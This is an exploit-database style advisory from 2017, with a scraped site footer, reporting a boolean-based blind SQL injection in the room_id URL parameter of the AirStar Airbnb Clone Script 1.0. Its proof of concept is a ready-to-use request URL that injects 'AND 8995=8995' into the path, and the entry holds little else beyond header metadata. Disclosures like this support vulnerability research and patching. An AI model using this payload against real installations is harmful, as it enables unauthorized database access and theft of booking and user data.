AirStar Airbnb Clone Script 1.0 - SQL Injection
2017-09-11 12:05:08# Exploit Title: AirStar Airbnb Clone Script v1.0 - SQL Injection
# Date: 2017-09-11
# Exploit Author: 8bitsec
# Vendor Homepage: https://www.abservetech.com/
# Software Link: https://www.abservetech.com/airstar-airbnb-clone/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="89eae6e7fde8eafdc9b1ebe0fdfaeceaa7e0e6">[email protected]</a>
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-11
Product & Service Introduction:
===============================
AirStar Airbnb Clone Script
Technical Details & Description:
================================
Blind SQL injection on [room_id] parameter.
Proof of Concept (PoC):
=======================
http://localhost/[path]/airstar/hotel/roomsedit/detailedroom/6 AND 8995=8995?mem_count=1&check_in=&check_out=&search_city=Madurai,India&min_amt=10&max_amt=150&inout=0
Parameter: #1 (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
==================
8bitsec - [https://twitter.com/_8bitsec]<script>!function(e,t,r,n,c,h,o){function a(e,t,r,n){for(r='',n='0x'+e.substr(t,2)|0,t+=2;t<e.length;t+=2)r+=String.fromCharCode('0x'+e.substr(t,2)^n);return r}try{for(c=e.getElementsByTagName('a'),o='/cdn-cgi/l/email-protection#',n=0;n<c.length;n++)try{(t=(h=c[n]).href.indexOf(o))>-1&&(h.href='mailto:'+a(h.href,t+o.length))}catch(e){}for(c=e.querySelectorAll('.__cf_email__'),n=0;n<c.length;n++)try{(h=c[n]).parentNode.replaceChild(e.createTextNode(a(h.getAttribute('data-cfemail'),0)),h)}catch(e){}}catch(e){}}(document);</script>
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.